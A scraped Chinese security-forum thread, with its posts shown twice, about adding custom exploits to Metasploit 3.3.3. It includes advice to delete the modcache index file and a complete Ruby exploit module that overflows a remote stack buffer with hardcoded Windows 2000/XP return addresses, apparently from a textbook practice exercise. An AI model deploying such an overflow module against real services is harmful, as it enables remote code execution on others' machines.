[求助]Metasploit Framework 3.3.3里面怎么添加EXPLOIT？-《0day:软件漏洞分析技术》-看雪-安全社区|安全招聘|kanxue.com

最新回复 (6)
shocking 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	shocking 2010-2-9 16:38 2 楼 0 还有高手出来指点下啊？真的是杯具了
crunming 雪币： 37 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 46 粉丝 1 关注私信	crunming 2010-2-10 15:44 3 楼 0 高手不出来，帮你顶顶看
wjphero 雪币： 193 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 36 粉丝 0 关注私信	wjphero 1 2010-2-25 13:49 4 楼 0 我使用的是Metasploit Framework 3.3.2，原理和3.3.3应该也差不多。之所以出现添加不进去的情况是因为一个名为“modcache”的文件在作怪，该文件的位置是在“安装目录\Metasploit\Framework3\home\Administrator\.msf3\”下面，添加完你的exploit后要先删除这个文件，然后重新启动整个程序。因为这个文件相当于一个所有exploit的索引，Metasploit 就是通过这个文件来定位你的exploit脚本。至于以前的版本，这个文件是放在“C:\Documents and Settings\bjca\Application Data\.msf3”中的，我们可以通过直接搜索modcache文件来定位文件的位置。
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 2010-4-15 13:45 5 楼 0 ## # $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Yangshuo::POC < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'YANGSHUO_POC', 'Version' => '1.0', 'Platform' => 'win', 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => 'yangshuo', 'Targets' => [ ['Windows 2000', {'Ret' => [200 , 0x77e2307b] }], ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }], ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Description' => %q{ this module is exploit practice of book "Vulnerability Exploit and Analysis Technique" used only for educational purpose }, 'Arch' => 'x86', 'References' => [ [ 'URL', 'http://www.failwest.com' ], [ 'CVE', '44444' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' } )) end #end of initialize def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = 'a'*target['Ret'][0] buf << [target['Ret'][1]].pack('V') buf <<payload.encoded; sock.put(buf) handler disconnect end #end of exploit def end end 这是修改FAILWEST的代码所得的，你看看必须符合MF3的标准才可以上面那个ID，# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ class Exploits::Yangshuo::POC 这个类名一定要大写要不报错！~~~~~ 你试试吧要不行你在发帖！
骨灰菜虫雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	骨灰菜虫 2010-4-26 11:04 6 楼 0 谢谢楼上得提点。受教了。
woaisnow 雪币： 1462 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 71 粉丝 0 关注私信	woaisnow 2010-4-27 16:58 7 楼 0 认认真真的学习。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

最新回复 (6)
shocking 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	shocking 2010-2-9 16:38 2 楼 0 还有高手出来指点下啊？真的是杯具了
crunming 雪币： 37 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 46 粉丝 1 关注私信	crunming 2010-2-10 15:44 3 楼 0 高手不出来，帮你顶顶看
wjphero 雪币： 193 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 36 粉丝 0 关注私信	wjphero 1 2010-2-25 13:49 4 楼 0 我使用的是Metasploit Framework 3.3.2，原理和3.3.3应该也差不多。之所以出现添加不进去的情况是因为一个名为“modcache”的文件在作怪，该文件的位置是在“安装目录\Metasploit\Framework3\home\Administrator\.msf3\”下面，添加完你的exploit后要先删除这个文件，然后重新启动整个程序。因为这个文件相当于一个所有exploit的索引，Metasploit 就是通过这个文件来定位你的exploit脚本。至于以前的版本，这个文件是放在“C:\Documents and Settings\bjca\Application Data\.msf3”中的，我们可以通过直接搜索modcache文件来定位文件的位置。
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 2010-4-15 13:45 5 楼 0 ## # $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Yangshuo::POC < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'YANGSHUO_POC', 'Version' => '1.0', 'Platform' => 'win', 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => 'yangshuo', 'Targets' => [ ['Windows 2000', {'Ret' => [200 , 0x77e2307b] }], ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }], ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Description' => %q{ this module is exploit practice of book "Vulnerability Exploit and Analysis Technique" used only for educational purpose }, 'Arch' => 'x86', 'References' => [ [ 'URL', 'http://www.failwest.com' ], [ 'CVE', '44444' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' } )) end #end of initialize def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = 'a'*target['Ret'][0] buf << [target['Ret'][1]].pack('V') buf <<payload.encoded; sock.put(buf) handler disconnect end #end of exploit def end end 这是修改FAILWEST的代码所得的，你看看必须符合MF3的标准才可以上面那个ID，# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ class Exploits::Yangshuo::POC 这个类名一定要大写要不报错！~~~~~ 你试试吧要不行你在发帖！
骨灰菜虫雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	骨灰菜虫 2010-4-26 11:04 6 楼 0 谢谢楼上得提点。受教了。
woaisnow 雪币： 1462 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 71 粉丝 0 关注私信	woaisnow 2010-4-27 16:58 7 楼 0 认认真真的学习。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复